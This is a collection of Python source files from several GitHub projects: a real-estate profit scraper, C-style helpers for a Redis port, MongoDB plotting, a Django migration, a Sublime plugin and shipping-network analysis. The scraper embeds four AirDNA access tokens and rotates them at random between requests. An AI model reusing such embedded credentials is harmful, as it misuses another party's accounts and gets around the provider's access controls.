'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',\n 'DNT': '1',\n }\n self.air_dna_access_token = [\n 'MjkxMTI|8b0178bf0e564cbf96fc75b8518a5375',\n 'ODkwMTc|478ce2c743244a7eb3d1cfddc14909b3',\n 'MjA2Mjcw|69e663b4c51c4830a8bde0d3355be8ee',\n 'MjA2Mjcz|e35b14ebfb794d849f9484afcffced1d'\n ]\n\n def get_all_redfin_listings(self):\n response = json.loads(requests.get('https://www.redfin.com/stingray/api/gis', headers=self.redfin_headers, params=self.redfin_params, cookies=self.redfin_cookies).text.replace('{}&&', ''))\n houses = response['payload']['homes']\n return houses\n\n def get_redfin_data(self, url, mls, house):\n print(f\"Getting data for {url}\")\n\n # Get information from Redfin\n street_address = house['streetLine']['value'] if 'value' in house['streetLine'].keys() else 'N/A'\n city = house['city']\n state = house['state']\n zip_code = house['zip']\n\n listed_price = house['price']['value'] if 'price' in house.keys() and 'value' in house['price'].keys() else 'N/A'\n beds = house['beds'] if 'beds' in house.keys() else 'N/A'\n baths = house['baths'] if 'baths' in house.keys() else 'N/A'\n\n # Days on Redfin\n days_on_market = house['timeOnRedfin']['value'] / (1000 * 60 * 60 * 24) if 'value' in house['timeOnRedfin'].keys() else 'N/A'\n year_build = house['yearBuilt']['value'] if 'yearBuilt' in house.keys() and 'value' in house['yearBuilt'].keys() else 'N/A'\n lot_size = house['lotSize']['value'] if 'lotSize' in house.keys() and 'value' in house['lotSize'].keys() else 'N/A'\n hoa = house['hoa']['value'] if 'value' in house['hoa'].keys() else 0\n sqft = house['sqFt']['value'] if 'value' in house['sqFt'].keys() else 'N/A'\n\n # Monthly expense info\n monthly_interest_rate = self.interest_rate/12\n numerator = (float(listed_price)*self.borrowing_pct)*(monthly_interest_rate*((1 + monthly_interest_rate)**(self.mortgage_term_years*12)))\n denominator = ((1+monthly_interest_rate)**(self.mortgage_term_years*12))-1\n monthly_expense = round(numerator/denominator + hoa + self.insurance_cost/12, 2)\n\n self.housing_data[mls] = {\n \"url\": url,\n \"street_address\": street_address,\n \"city\": city,\n \"state\": state,\n \"zip_code\": zip_code,\n \"listed_price\": listed_price,\n \"beds\": beds,\n \"baths\": baths,\n \"days_on_market\": round(days_on_market) if isinstance(days_on_market, float) else 'N/A',\n \"monthly_expense\": monthly_expense,\n \"year_build\": year_build,\n \"lot_size\": lot_size,\n \"hoa\": hoa,\n \"sqft\": sqft,\n }\n\n def get_airdna_data(self, mls, house):\n # Get information from AirDNA\n street_address = self.housing_data[mls]['street_address']\n city = self.housing_data[mls]['city']\n state = self.housing_data[mls]['state']\n baths = self.housing_data[mls]['baths']\n beds = self.housing_data[mls]['beds']\n monthly_expense = self.housing_data[mls]['monthly_expense']\n full_address = f'{street_address}, {city}, {state}, USA'\n params = (\n ('access_token', self.air_dna_access_token[randint(0, 3)]),\n ('city_id', '59193'),\n ('accommodates', '6'),\n ('bathrooms', str(baths)[0] if baths != 'N/A' else baths),\n ('bedrooms', str(beds) if beds != 'N/A' else beds),\n ('currency', 'native'),\n ('address', full_address),\n )\n\n try:\n response = json.loads(requests.get('https://api.airdna.co/v1/market/estimate', headers=self.air_dna_headers, params=params).content.decode())\n nightly_price = response['property_stats']['adr']['ltm']\n occupancy_rate = response['property_stats']['occupancy']['ltm']\n monthly_revenue = round(response['property_stats']['revenue']['ltm']/12, 2)\n monthly_profit = round(monthly_revenue - float(monthly_expense), 2)\n except Exception as e:\n print(f'No AirDNA result for {full_address}.')\n nightly_price = 'N/A'\n occupancy_rate = 'N/A'\n monthly_revenue = 'N/A'\n monthly_profit = 'N/A'\n\n self.housing_data[mls]['nightly_price'] = nightly_price\n self.housing_data[mls]['occupancy_rate'] = occupancy_rate\n self.housing_data[mls]['monthly_revenue'] = monthly_revenue\n self.housing_data[mls]['monthly_profit'] = monthly_profit\n\n\n def get_local_data(self, mls):\n zip_code = self.housing_data[mls]['zip_code']\n county = self.search.by_zipcode(zip_code).county\n if county in self.exception_counties.keys():\n county = self.exception_counties[county]\n\n state = self.housing_data[mls]['state']\n employment_total_covered = self.county_info[state][county]['employment_total_covered'] if county in self.county_info[state].keys() else 'N/A'\n twelve_month_change_pct = self.county_info[state][county]['twelve_month_change_pct'] if county in self.county_info[state].keys() else 'N/A'\n twelve_month_change = self.county_info[state][county]['twelve_month_change'] if county in self.county_info[state].keys() else 'N/A'\n avg_weekly_salary = self.county_info[state][county]['avg_weekly_salary'] if county in self.county_info[state].keys() else 'N/A'\n avg_weekly_12mo_change_salary = self.county_info[state][county]['avg_weekly_12mo_change_salary'] if county in self.county_info[state].keys() else 'N/A'\n\n self.housing_data[mls]['employment_total_covered'] = employment_total_covered\n self.housing_data[mls]['twelve_month_change_pct'] = twelve_month_change_pct\n self.housing_data[mls]['twelve_month_change'] = twelve_month_change\n self.housing_data[mls]['avg_weekly_salary'] = avg_weekly_salary\n self.housing_data[mls]['avg_weekly_12mo_change_salary'] = avg_weekly_12mo_change_salary\n\n\n\n def write_output(self, mls):\n writerrow_top = False if 'data.csv' in os.listdir('./') else True\n with open('./data.csv', mode='a') as output_file:\n writer = csv.writer(output_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_ALL)\n\n if writerrow_top:\n # Header\n writer.writerow([\n \"region\",\n \"url\",\n \"street_address\",\n \"days_on_market\",\n \"city\",\n \"state\",\n \"zip_code\",\n \"hoa\",\n \"sqft\",\n \"lot_size\",\n \"year_build\",\n \"listed_price\",\n \"beds\",\n \"baths\",\n \"monthly_expense\",\n \"nightly_price\",\n \"occupancy_rate\",\n \"monthly_revenue\",\n \"employment_total_covered\",\n \"twelve_month_change_pct\",\n \"twelve_month_change\",\n \"avg_weekly_salary\",\n \"avg_weekly_12mo_change_salary\",\n \"monthly_profit\",\n ])\n\n writer.writerow([\n self.region,\n self.housing_data[mls]['url'],\n self.housing_data[mls]['street_address'],\n self.housing_data[mls]['days_on_market'],\n self.housing_data[mls]['city'],\n self.housing_data[mls]['state'],\n self.housing_data[mls]['zip_code'],\n self.housing_data[mls]['hoa'],\n self.housing_data[mls]['sqft'],\n self.housing_data[mls]['lot_size'],\n self.housing_data[mls]['year_build'],\n self.housing_data[mls]['listed_price'],\n self.housing_data[mls]['beds'],\n self.housing_data[mls]['baths'],\n self.housing_data[mls]['monthly_expense'],\n self.housing_data[mls]['nightly_price'],\n self.housing_data[mls]['occupancy_rate'],\n self.housing_data[mls]['monthly_revenue'],\n self.housing_data[mls]['employment_total_covered'],\n self.housing_data[mls]['twelve_month_change_pct'],\n self.housing_data[mls]['twelve_month_change'],\n self.housing_data[mls]['avg_weekly_salary'],\n self.housing_data[mls]['avg_weekly_12mo_change_salary'],\n self.housing_data[mls]['monthly_profit'],\n ])\n\n\n def combine_data(self, house):\n mls = house['mlsId']['value']\n url = 'https://www.redfin.com' + house['url']\n\n # Get Redfin data\n self.get_redfin_data(url, mls, house)\n\n # Get AirDNA Data\n self.get_airdna_data(mls, house)\n\n # Get locality employment information\n self.get_local_data(mls)\n\n # Write output\n self.write_output(mls)\n\n\n def fetch_data(self):\n houses = self.get_all_redfin_listings()\n\n # Create separate processes by houses\n process = []\n for house in houses:\n proc = multiprocessing.Process(target=self.combine_data, args=(house,))\n process.append(proc)\n proc.start()\n\n for proc in process:\n proc.join()","repo_name":"rca241231/project_pikachu","sub_path":"modules/RealEstateInfo.py","file_name":"RealEstateInfo.py","file_ext":"py","file_size_in_byte":10939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39760867076","text":"import struct\nimport locale\nfrom datetime import datetime\nfrom typing import Union\nfrom copy import copy as c_assignment # 模拟c语言赋值, 拷贝所有成员\nfrom random import randint\n\n\n__all__ = [\n 'cstr',\n 'NUL',\n 'UINT_MASK',\n 'ULONG_MASK',\n 'LONG_MIN',\n 'LONG_MAX',\n 'INT64_MAX',\n 'INT64_MIN',\n 'INT32_MAX',\n 'INT32_MIN',\n 'INT16_MAX',\n 'INT16_MIN',\n 'INT8_MAX',\n 'INT8_MIN',\n 'UINT16_MAX',\n 'UCHAR_MAX',\n 'strlen',\n 'memcmp',\n 'memcpy',\n 'memmove',\n 'cstr2uint32',\n 'cstr2int64',\n 'cstr2uint64',\n 'char_tolower',\n 'c_assignment',\n 'zfree',\n 'c_random',\n 'ptr2long',\n 'strcoll',\n 'int2cstr',\n 'cstr2int',\n 'intptr',\n 'cstrptr',\n 'timeval',\n]\n\ncstr = Union[bytearray, bytes]\n\n# C语言 \\0\nNUL = 0\nUINT_MASK = 2 ** 32 - 1\nULONG_MASK = 2 ** 64 - 1\nINT64_MAX = 2 ** 63 - 1\nINT64_MIN = -INT64_MAX - 1\nINT32_MAX = 2 ** 31 - 1\nINT32_MIN = -INT32_MAX - 1\nINT16_MAX = 2 ** 15 - 1\nINT16_MIN = -INT16_MAX - 1\nINT8_MAX = 2 ** 7 - 1\nINT8_MIN = -INT8_MAX - 1\nLONG_MIN = INT64_MIN\nLONG_MAX = INT64_MAX\n\nUINT16_MAX = 2 ** 16 - 1\nUCHAR_MAX = 255\n\ncstr2uint32 = lambda data: struct.unpack('=I', data)[0]\ncstr2uint64 = lambda data: struct.unpack('=Q', data)[0]\ncstr2int64 = lambda data: struct.unpack('=q', data)[0]\nc_random = lambda: randint(0, 2147483647)\n\npack_type_map = {\n 'int8': 'b',\n 'int16': 'h',\n 'int32': 'i',\n 'int64': 'q',\n 'uint8': 'B',\n 'uint16': 'H',\n 'uint32': 'I',\n 'uint64': 'Q',\n}\n\ndef int2cstr(v: int, int_type: str) -> bytes:\n return struct.pack('=' + pack_type_map[int_type], v)\n\ndef cstr2int(buf: cstr, int_type: str) -> int:\n return struct.unpack('=' + pack_type_map[int_type], buf)[0]\n\ndef zfree(ptr) -> None:\n del ptr\n\ndef strlen(string: cstr) -> int:\n res = 0\n for i in string:\n if i == NUL:\n break\n res += 1\n return res\n\ndef memcmp(s1: cstr, s2: cstr, length: int) -> int:\n minlen = min(len(s1), len(s2), length)\n for i in range(minlen):\n if s1[i] > s2[i]:\n return 1\n elif s1[i] < s2[i]:\n return -1\n return 0\n\ndef memcpy(dest: bytearray, src: cstr, length: int) -> None:\n dest[:length] = src[:length]\n\ndef memmove(buf: bytearray, dest_pos: int, src_pos: int, length: int) -> None:\n buf[dest_pos:dest_pos+length] = buf[src_pos:src_pos+length]\n\ndef char_tolower(char: int):\n tmp = bytearray()\n tmp.append(char)\n return tmp.lower()[0]\n\ndef ptr2long(ptr) -> int:\n assert id(ptr) <= ULONG_MASK\n return id(ptr)\n\ndef strcoll(a: cstr, b: cstr):\n return locale.strcoll(a.decode(), b.decode())\n\nclass intptr:\n def __init__(self, value=0):\n self.value: int = value\n\nclass cstrptr:\n def __init__(self, buf: bytearray, pos=0):\n self.buf = buf\n self.pos = pos\n\n def new(self, pos) -> 'cstrptr':\n return cstrptr(self.buf, pos)\n\n def __eq__(self, other) -> bool:\n return self.buf is other.buf and self.pos == other.pos\n\nclass timeval:\n def __init__(self):\n self.tv_sec: int = 0\n self.tv_usec: int = 0\n\n @property\n def time(self):\n return self.tv_sec + (self.tv_usec // 1000000)\n\n @property\n def mstime(self):\n return self.time * 1000 + self.tv_usec // 1000\n\n @property\n def ustime(self):\n return self.time * 1000000 + self.tv_usec\n\n @classmethod\n def from_datetime(cls, dt: datetime=None):\n \"\"\"create timeval from datetime\"\"\"\n if dt is None:\n dt = datetime.now()\n tv = cls()\n tv.tv_sec = int(dt.timestamp())\n tv.tv_usec = dt.microsecond\n return tv\n","repo_name":"ruanimal/redis-server-py","sub_path":"redis_server/csix.py","file_name":"csix.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"16258821189","text":"import pymongo\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mplleaflet\nfrom matplotlib.collections import PolyCollection\nmy_client = pymongo.MongoClient(\"mongodb://18.222.192.138:27017/\")\n#my_client = pymongo.MongoClient(\"mongodb://10.122.15.69:27017/\")\nprint('MongoDB Connection Success!')\nmy_db = my_client['51ca']\nmy_boundary = my_db['boundary']\nmy_assault = my_db['assault']\nmy_estate = my_db['estate']\nmy_year_price = my_db['sales']\n\ndef get_boundary(city_name):\n '''\n search a boundary coordinate of a given city\n\n :param city_name: str\n :return: list: contains boundary coordinate\n '''\n boundary = my_boundary.find_one({\"city_name\": city_name})['boundary']\n return boundary\n\ndef get_assault():\n '''\n return a list, every item includes 2017, 2018........\n :return: list\n '''\n result = my_assault.find()\n item_list = [item for item in result]\n return item_list\n\ndef get_year_price():\n result = my_year_price.find()\n item_list = [item for item in result]\n return item_list\nif __name__ == \"__main__\":\n boundary_list=get_boundary('toronto')\n boundary_list = [(boundary['lat'], boundary['lng']) for boundary in boundary_list]\n # print(boundary_list[0])\n\n boundary_list=np.asarray(boundary_list)\n\n boundary_list[:,[0,1]] = boundary_list[:,[1, 0]]\n print(len(boundary_list))\n boundary_list=boundary_list.reshape(1,1315,2)\n fig, ax = plt.subplots()\n coll = PolyCollection(boundary_list,facecolors='yellow',edgecolors='black')\n ax.add_collection(coll)\n #estate_info = my_estate.find()\n estate_info = my_estate.find({},{\"price\":1,'_id':0, 'city':1})\n estate_info_list = [estate for estate in estate_info]\n print(\"price of estate\",estate_info_list)\n estate_np=np.asarray(estate_info_list)\n #print(estate_info_list[:100])\n price = get_year_price()\n #3.28\n price_list = [(price_l['averageSoldPrice'])for price_l in price]\n price_list = np.asarray(price_list)\n print(price_list.max())\n print(price_list.min())\n\n\n #plt.show()\n\n # graph show\n #ax.plot(boundary_list[:,0],boundary_list[:,1] ,'gs') # fast repair\n #mplleaflet.show(tiles='cartodb_positron', path='pot_holes.html',)\n\n\n\n","repo_name":"TimorChow/timorchow.github.io","sub_path":"visualization/torontoPrice/data analyze/mongodb_process.py","file_name":"mongodb_process.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"40788406732","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('simple_seo', '__first__'),\n ('blog', '0003_blog_tags'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MyMetadata',\n fields=[\n ('allmetadata_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='simple_seo.AllMetadata')),\n ],\n options={\n },\n bases=('simple_seo.allmetadata',),\n ),\n ]\n","repo_name":"workcode/simplelifetest","sub_path":"apps/blog/migrations/0004_mymetadata.py","file_name":"0004_mymetadata.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71025036005","text":"import sublime, sublime_plugin, re, subprocess\nfrom subprocess import Popen\nfrom subprocess import PIPE\n\nclass PhpBeautifierCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n FILE = self.view.file_name()\n if FILE[-3:] == 'php':\n indent = \"-s4\"\n filters = \"ArrayNested() NewLines(before=switch:while:for:foreach:T_CLASS:return:break) Pear(add-header=false)\"\n allFile = sublime.Region(0, self.view.size())\n AllFileText = self.view.substr(allFile).encode('utf-8')\n cmd = \"php_beautifier\"\n p = Popen([cmd, indent, \"-l\", filters, \"-f\", \"-\", \"-o\", \"-\"], stdin = PIPE, stdout = PIPE, stderr=PIPE)\n stdout, stderr = p.communicate(AllFileText)\n if len(stderr) == 0:\n self.view.replace(edit, allFile, self.fixup(stdout))\n else:\n self.show_error_panel(self.fixup(stderr))\n\n # Error panel & fixup from external command\n # https://github.com/technocoreai/SublimeExternalCommand\n def show_error_panel(self, stderr):\n panel = self.view.window().get_output_panel(\"php_beautifier_errors\")\n panel.set_read_only(False)\n edit = panel.begin_edit()\n panel.erase(edit, sublime.Region(0, panel.size()))\n panel.insert(edit, panel.size(), stderr)\n panel.set_read_only(True)\n self.view.window().run_command(\"show_panel\", {\"panel\": \"output.php_beautifier_errors\"})\n panel.end_edit(edit)\n\n def fixup(self, string):\n return re.sub(r'\\r\\n|\\r', '\\n', string.decode('utf-8'))\n","repo_name":"BarbUk/Sublime-php-beautifier","sub_path":"php_beautifier.py","file_name":"php_beautifier.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"19416437426","text":"#! python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: Qian Pan\n@e-mail: qianpan_93@163.com\n\"\"\"\n\n\nfrom configure import *\n\n\nclass LFCConnection:\n def __init__(self, num_sc):\n self.Distance_col = 'Distance(GC,unit:km)'\n self.NUM_SC = num_sc\n self.list_core_ports = Nodes.sort_values('B', ascending=False)['id'][:self.NUM_SC].values\n self.list_non_core_port = list(set(Nodes['id']).difference(set(self.list_core_ports)))\n\n def core_connections_importance(self):\n df_dis = pd.read_csv('../data/Other data/Distance_SR_GC_' + YEAR + '.csv')\n dict_dis = dict(zip(df_dis['Edge'].astype(str), df_dis[self.Distance_col]))\n df_edges = Edges.copy()\n df_edges['Edge'] = df_edges['source'].astype(str) + '--' + df_edges['target'].astype(str)\n df_edges['Distance'] = df_edges['Edge'].apply(dict_dis.get)\n\n # core connections\n core_ix = df_edges['source'].isin(self.list_core_ports) & df_edges['target'].isin(self.list_core_ports)\n df_edges.loc[core_ix, 'LFC'] = 'core'\n\n # local connections\n local_ix = df_edges['source'].isin(self.list_non_core_port) & df_edges['target'].isin(self.list_non_core_port)\n df_edges.loc[local_ix, 'LFC'] = 'local'\n\n # feeder connections\n feeder_ix = (~core_ix) & (~local_ix)\n df_edges.loc[feeder_ix, 'LFC'] = 'feeder'\n\n link_percentage = round(df_edges.groupby('LFC')['source'].count() / len(df_edges) * 100, 1)\n len_percentage = round(df_edges.groupby('LFC')['Distance'].sum() / df_edges['Distance'].sum() * 100, 1)\n\n df_res_b = pd.concat([link_percentage, len_percentage], axis=1)\n df_res_b['types of connections'] = df_res_b.index\n df_res_b.rename(columns={'source': 'Link percentage', 'Distance': 'Length percentage'}, inplace=True)\n df_res_b['Length percentage / Link percentage'] = round(df_res_b['Length percentage'] / df_res_b['Link percentage'], 1)\n df_res_b = df_res_b[['types of connections', 'Link percentage', 'Length percentage', 'Length percentage / Link percentage']]\n\n dis_mean = df_edges.groupby('LFC')['Distance'].mean()\n dis_std = df_edges.groupby('LFC')['Distance'].std()\n all_edges_mean = df_edges['Distance'].mean()\n all_edges_std = df_edges['Distance'].std()\n\n print('The in-text result:')\n print()\n print('\"First, core connections themselves tend to be longer than feeder and local connections (Supplementary Fig. 16b). '\n 'Measured by real nautical distance (hereafter referred to as distance), the average length of core '\n 'connections (average = {:.0f} km, SD = {:.0f} km) is {:.1f} times of the average over all inter-port '\n 'connections (average = {:.0f} km, SD = {:.0f} km); feeder connections (average= {:.0f} km, SD = {:.0f} km)'\n ', {:.1f} times; local connections (average = {:.0f} km, SD= {:.0f} km), {:.1f} times.\"'.format(\n dis_mean['core'], dis_std['core'], dis_mean['core'] / all_edges_mean, all_edges_mean, all_edges_std,\n dis_mean['feeder'], dis_std['feeder'], dis_mean['feeder'] / all_edges_mean, dis_mean['local'],\n dis_std['local'], dis_mean['local'] / all_edges_mean))\n print()\n\n if SAVE_RESULT:\n save_path = os.path.join('output', 'Supplementary note 8')\n if os.path.exists(save_path):\n pass\n else:\n os.makedirs(save_path)\n filename = 'Supplementary Fig. 16 Statistics of the core, feeder and local connections (b).xlsx'\n df_res_b.to_excel(save_path + '/' + filename, index=False)\n print('The result file \"{}\" saved at: \"{}\"'.format(filename, save_path))\n print()\n\n return df_edges\n\n def write_glsn_non_core_sp(self):\n # non core sp\n list_non_core_sp = []\n for s, port_s in enumerate(self.list_non_core_port[:-1]):\n for port_t in self.list_non_core_port[s + 1:]:\n path = nx.all_shortest_paths(G, source=port_s, target=port_t)\n for p in path:\n list_non_core_sp.append(p)\n non_core_sp = pd.Series(list_non_core_sp)\n save_path = os.path.join('output', 'process')\n if os.path.exists(save_path):\n pass\n else:\n os.makedirs(save_path)\n non_core_sp.to_csv(save_path + '/nsc_sp.csv', header=False, index=False)\n\n # non core sp travel through core connections\n core_edges = Edges[(Edges['source'].isin(self.list_core_ports)) & (Edges['target'].isin(self.list_core_ports))]\n list_source = core_edges['source'].values.tolist()\n list_target = core_edges['target'].values.tolist()\n tuple_edges = list((zip(list_source, list_target))) # core edges\n tuple_edges_re = list((zip(list_target, list_source))) # source-target reversed core edges\n central_ports = set(self.list_core_ports)\n list_sp = []\n for s, port_s in enumerate(self.list_non_core_port[:-1]):\n for port_t in self.list_non_core_port[s + 1:]:\n shortest_paths = nx.all_shortest_paths(G, source=port_s, target=port_t)\n\n for path in shortest_paths:\n union_nodes = central_ports.intersection(path)\n num_union = len(union_nodes)\n if num_union >= 2:\n union_indexes = [path.index(each) for each in union_nodes]\n union_indexes = sorted(union_indexes)\n for i in range(len(union_indexes) - 1):\n index_diff = union_indexes[i + 1] - union_indexes[i]\n if index_diff < 2:\n edge = (path[union_indexes[i]], path[union_indexes[i + 1]])\n if edge in tuple_edges or edge in tuple_edges_re:\n list_sp.append(path)\n break\n\n sp = pd.Series(list_sp)\n save_path = os.path.join('output', 'process')\n if os.path.exists(save_path):\n pass\n else:\n os.makedirs(save_path)\n sp.to_csv(save_path + \"/nsc_sp_travel_through_sc.csv\", header=False, index=False)\n\n @staticmethod\n def pr_lfc(edges):\n def process_edge_data(edges):\n df_edge_copy = edges.copy()\n s_cols = [col for col in edges.columns if 'source' in col]\n t_cols = [col for col in edges.columns if 'target' in col]\n tmp = edges[s_cols].copy()\n df_edge_copy[s_cols] = df_edge_copy[t_cols]\n df_edge_copy[t_cols] = tmp\n df_edge = pd.concat([edges, df_edge_copy], axis=0)\n df_edge.index = range(0, len(df_edge))\n\n edge_merged = []\n for ind in df_edge.index:\n edge = (df_edge.loc[ind, 'source'], df_edge.loc[ind, 'target'])\n edge_merged.append(edge)\n\n df_edge['Edge'] = edge_merged\n return df_edge\n\n def process_sp_data(spdata, path_sp_split):\n spdata.columns = ['SP']\n\n # create dataframe columns names, forward: E,reversed: RE\n pair_cols = ['E' + str(i) for i in range(10)]\n\n # create forward dataframe\n data_split_sp = []\n for ind in spdata.index:\n sp = eval(spdata.ix[ind, 'SP'])\n sp_pair = list(zip(sp, np.roll(sp, -1)))[:-1]\n pair_series = dict(zip(*[pair_cols, sp_pair]))\n data_split_sp.append(pair_series)\n\n data_split_sp = pd.DataFrame(data_split_sp)\n data_split_sp.to_csv(path_sp_split, index=False)\n del data_split_sp\n\n def get_propertys_(df_edge, data_splited):\n edge2distance = dict(zip(df_edge['Edge'].astype(str), df_edge['Distance']))\n edge2property = dict(zip(df_edge['Edge'].astype(str), df_edge['LFC']))\n col_origin = data_splited.columns\n property_cols = ['LFC' + str(i) for i in range(10)]\n distance_cols = ['Distance' + str(i) for i in range(10)]\n for i, col_i in enumerate(col_origin):\n data_splited[property_cols[i]] = data_splited[col_i].apply(edge2property.get)\n data_splited[distance_cols[i]] = data_splited[col_i].apply(edge2distance.get)\n data_splited.drop(columns=col_origin, inplace=True)\n return data_splited\n\n PATH_SPS = ['output/process/nsc_sp.csv', 'output/process/nsc_sp_travel_through_sc.csv']\n PATH_SP_SPLIT = ['output/process/nsc_sp_splited_st.csv',\n 'output/process/nsc_sp_travel_through_sc_splited_st.csv']\n\n df_res_c = pd.DataFrame()\n for ix, PATH_SP in enumerate(PATH_SPS):\n df_edge = process_edge_data(edges)\n spdata = pd.read_csv(PATH_SP, header=None)\n process_sp_data(spdata, PATH_SP_SPLIT[ix])\n\n data_split_sp = pd.read_csv(PATH_SP_SPLIT[ix], low_memory=False)\n data_sp = get_propertys_(df_edge, data_split_sp)\n\n # calculate Distance sumation\n d_cols = [col for col in data_sp.columns if 'Distance' in col]\n data_sp['Distance_sum'] = data_sp[d_cols].sum(axis=1)\n\n # combine with original dataframe to measure\n sp_data_ori = pd.read_csv(PATH_SP, header=None)\n sp_data_ori.columns = ['SP']\n data_all = pd.concat([sp_data_ori, data_sp], axis=1)\n\n distance_col = [col for col in data_all.columns if 'Distance' in col and col != 'Distance_sum']\n property_col = [col for col in data_all.columns if 'LFC' in col]\n\n df_property_dis = pd.DataFrame()\n for d_col, p_col in zip(distance_col, property_col):\n lfc_dis = data_all.groupby(p_col, as_index=True)[d_col].sum()\n df_property_dis = pd.concat([df_property_dis, lfc_dis], axis=0)\n\n df_property_dis.columns = ['Distance']\n df_property_dis['LFC'] = df_property_dis.index\n\n df_res = df_property_dis.groupby('LFC', as_index=False)['Distance'].sum()\n if PATH_SP == 'output/process/nsc_sp.csv':\n df_res['shipping distance of all paths between non-core ports'] = round(df_res['Distance'] / (data_all['Distance_sum'].sum()) * 100, 1)\n else:\n df_res['shipping distance of paths between non-core ports traveling through structural-core'] = round(\n df_res['Distance'] / (data_all['Distance_sum'].sum()) * 100, 1)\n df_res.drop(columns=['LFC', 'Distance'], inplace=True)\n df_res_c = pd.concat([df_res_c, df_res], axis=1)\n\n df_res_c.index = range(len(df_res_c))\n df_res_c['types of connections'] = ['core', 'feeder', 'local']\n ix_1 = df_res_c['types of connections'] == 'core'\n ix_2 = df_res_c['types of connections'] == 'feeder'\n ix_3 = df_res_c['types of connections'] == 'local'\n df_res_c.loc[ix_1, 'Distance percentage / Link percentage (Left)'] = round(df_res_c.loc[ix_1, 'shipping distance of all paths between non-core ports'] / 3.2, 1)\n df_res_c.loc[ix_2, 'Distance percentage / Link percentage (Left)'] = round(df_res_c.loc[ix_2, 'shipping distance of all paths between non-core ports'] / 32.7, 1)\n df_res_c.loc[ix_3, 'Distance percentage / Link percentage (Left)'] = round(df_res_c.loc[ix_3, 'shipping distance of all paths between non-core ports'] / 64.1, 1)\n\n df_res_c.loc[ix_1, 'Distance percentage / Link percentage (Right)'] = round(df_res_c.loc[\n ix_1, 'shipping distance of paths between non-core ports traveling through structural-core'] / 3.2, 1)\n df_res_c.loc[ix_2, 'Distance percentage / Link percentage (Right)'] = round(df_res_c.loc[\n ix_2, 'shipping distance of paths between non-core ports traveling through structural-core'] / 32.7, 1)\n df_res_c.loc[ix_3, 'Distance percentage / Link percentage (Right)'] = round(df_res_c.loc[\n ix_3, 'shipping distance of paths between non-core ports traveling through structural-core'] / 64.1, 1)\n\n df_res_c = df_res_c[['types of connections', 'shipping distance of all paths between non-core ports',\n 'Distance percentage / Link percentage (Left)',\n 'shipping distance of paths between non-core ports traveling through structural-core',\n 'Distance percentage / Link percentage (Right)']]\n if SAVE_RESULT:\n save_path = os.path.join('output', 'Supplementary note 8')\n if os.path.exists(save_path):\n pass\n else:\n os.makedirs(save_path)\n filename = 'Supplementary Fig. 16 Statistics of the core, feeder and local connections (c).xlsx'\n df_res_c.to_excel(save_path + '/' + filename, index=False)\n print('The result file \"{}\" saved at: \"{}\"'.format(filename, save_path))\n print()\n\n del_path = 'output/process'\n if os.path.exists(del_path):\n shutil.rmtree(del_path)\n else:\n pass\n\n\ndef startup():\n print('*********************************')\n print(\"Location in the manuscript text: \")\n print('Section titled \"Supplementary note 8: Significant importance of core connections in supporting '\n 'long-distance maritime transportation; calculations are based on great-circle distance\"')\n print('*********************************')\n print()\n print('***************************RUN TIME WARNING***************************')\n print('It needs 2 hours for corresponding experiments.')\n print()\n print('---------------------------------------------------------------------------------------------------')\n print('Output:')\n print()\n\n num_sc_nodes = 37\n instance = LFCConnection(num_sc_nodes)\n df_edges = instance.core_connections_importance()\n instance.write_glsn_non_core_sp()\n instance.pr_lfc(df_edges)\n","repo_name":"Network-Maritime-Complexity/Structural-core","sub_path":"code/Supplementary information code/note8.py","file_name":"note8.py","file_ext":"py","file_size_in_byte":14250,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"11729420794","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals\nimport sys\n\nsys.path.append(\"../\")\n\n\n\nclass ExtractData(object) :\n \n def __init__(self, termname, termtype, level=1):\n \n self.term_name = termname\n self.term_type = termtype\n self.level = level\n self.simu = 0.0\n self.term_value = []\n self.full_term = False\n \n def set_full(self):\n self.full_term = True\n \n \n # add extraction value \n def add_value(self, value, simu) :\n found = False\n for elem in self.term_value :\n if value == elem[0] :\n found = True\n break\n \n if (found == False) :\n if simu == 1 or self.simu != 1 :\n #if simu == 1 or simu > self.simu :\n self.term_value.append([value, simu])\n self.simu = simu\n \n # add extraction value \n def remove_term_elements(self) :\n nb = len(self.term_value)\n if (nb > 0) :\n for n in range(0, nb) :\n val = self.term_value[nb - n -1]\n if val[1] != 1 :\n self.term_value.remove(val)\n \n \n def add_term_element(self, value, simu) :\n self.remove_term_elements()\n \n added = False\n for val in self.term_value :\n if value in val:\n added= True;\n break\n elif val[0] in value :\n self.term_value.remove(val)\n break\n \n if not added :\n self.term_value.append([value, simu])\n \n\n\n\n ","repo_name":"minlogiciel/docutone","sub_path":"smart/python/src/com/docutone/utils/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36567939299","text":"import scriptless\nfrom scriptless.utils import isjsobj\nfrom scriptless.jsclasses import WebAPIBase, Window, Document, Location\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\napp.debug = True\n\nscriptless.init(app)\n\ndef change_heading(window: Window, document: Document, location: Location):\n\theading = 